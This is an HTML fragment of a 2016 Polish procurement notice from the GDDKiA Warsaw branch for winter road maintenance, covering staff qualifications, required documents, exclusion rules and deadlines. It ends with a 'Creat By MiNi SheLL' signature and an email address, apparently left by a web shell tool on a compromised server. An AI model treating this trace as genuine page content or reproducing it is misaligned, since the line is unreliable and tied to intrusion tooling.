3)	Stanowisko - Kierujący akcją zud; Minimalna liczba personelu - 5 osób; Wymagane uprawnienia - nie wymagane; Doświadczenie zawodowe - Min. 6 miesięczne doświadczenie zawodowe przy zimowym utrzymaniu dróg / ulic klasy min G na stanowisku dyspozytora lub jego zastępcy - należy wykazać okres (od - do) oraz na jakim zadaniu (nr i odcinki dróg/ulic)
4)	Stanowisko - Kierowca pługu/solarki/piaskarki; Minimalna liczba personelu - 48 osób (po 2 osoby na każdy pojazd); Wymagane uprawnienia - prawo jazdy na dany pojazd; Doświadczenie zawodowe - min. jedna osoba z dwuzmianowej (dwuosobowej) obsługi pojazdu ma posiadać min. 6 miesięczne doświadczenie zawodowe przy zimowym utrzymaniu dróg / ulic - należy wykazać okres (od - do) oraz na jakim zadaniu (nr i odcinki dróg/ulic)
5)	Stanowisko - Operator równiarki/ładowarki/koparko-ładowarki; Minimalna liczba personelu - 20 osób (2 osoby na każdy sprzęt); Wymagane uprawnienia - uprawnienia operatora na dany sprzęt; Doświadczenie zawodowe - min. jedna osoba z dwuzmianowej (dwuosobowej) obsługi sprzętu ma posiadać min. 6 miesięczne doświadczenie zawodowe przy zimowym utrzymaniu dróg lub ulic - należy wykazać okres (od - do) oraz na jakim zadaniu (nr i odcinki dróg, ulic)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt III.4.1. niniejszego Ogłoszenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca może polegać na zasobach innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia. 2. W sytuacji gdy, Wykonawca polega zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest udowodnić, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 3. Jeżeli Wykonawca wykazując spełnienie warunku, o którym mowa w art. 22 ust. 1 ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia Zamawiający wymaga przedłożenia w odniesieniu do tych podmiotów oświadczenia o braku podstaw do wykluczenia z postępowania w okolicznościach, o którym mowa w art. 24 ust. 1 ustawy Pzp. 4. Jeżeli Wykonawca wykazując spełnienie warunku, o którym mowa w art. 22 ust. 1 ustawy Pzp polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, Zamawiający w celu oceny czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów dotyczących: a) zakresu dostępnych Wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa: w pkt III.4. 2 Ogłoszenia - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 6. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. 7. W celu potwierdzenia spełniania warunków wymaganych od Wykonawców wspólnie ubiegających się o udzielenie zamówienia: a) oświadczenie i dokument wymienione w pkt III.4.2) powyżej albo odpowiadające im określone w pkt III.4.3.1) oraz dokumenty wymienione w pkt. III.4.4) powinny być złożone przez każdego Wykonawcę; b) oświadczenie wymienione w pkt III.4.1) powinno być złożone w imieniu wszystkich Wykonawców; c) dokumenty wymienione w pkt III.4.1) powinien złożyć dowolny/dowolni Wykonawca/y spośród Wykonawców składających wspólną ofertę. 8. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełnienia warunków o których mowa w art. 24 ust. 1 oraz art. 24 ust. 2 punkt 5 ustawy Pzp, natomiast spełnienie warunków wskazanych w art. 22 ust. 1 ustawy Pzp, których opis sposobu oceny spełnienia został zamieszczony w pkt. III.3.2) i III.3.4) Ogłoszenia o zamówieniu, Wykonawcy wykazują łącznie. 9. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów, o których mowa w pkt III.4) niniejszego ogłoszenia, na zasadzie spełnia - nie spełnia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji jakości - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy dopuszczalna jest w szczególnie uzasadnionych przypadkach na warunkach ściśle określonych w Siwz</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gddkia.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Warszawie; ul. Mińska 25, 03-808 Warszawa; VII piętro; pokój 713 oraz na stronie internetowej Zamawiającego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2016 godzina 11:30, miejsce: Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Warszawie, ul. Mińska 25, 03-808 Warszawa, VII piętro, pokój 713..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com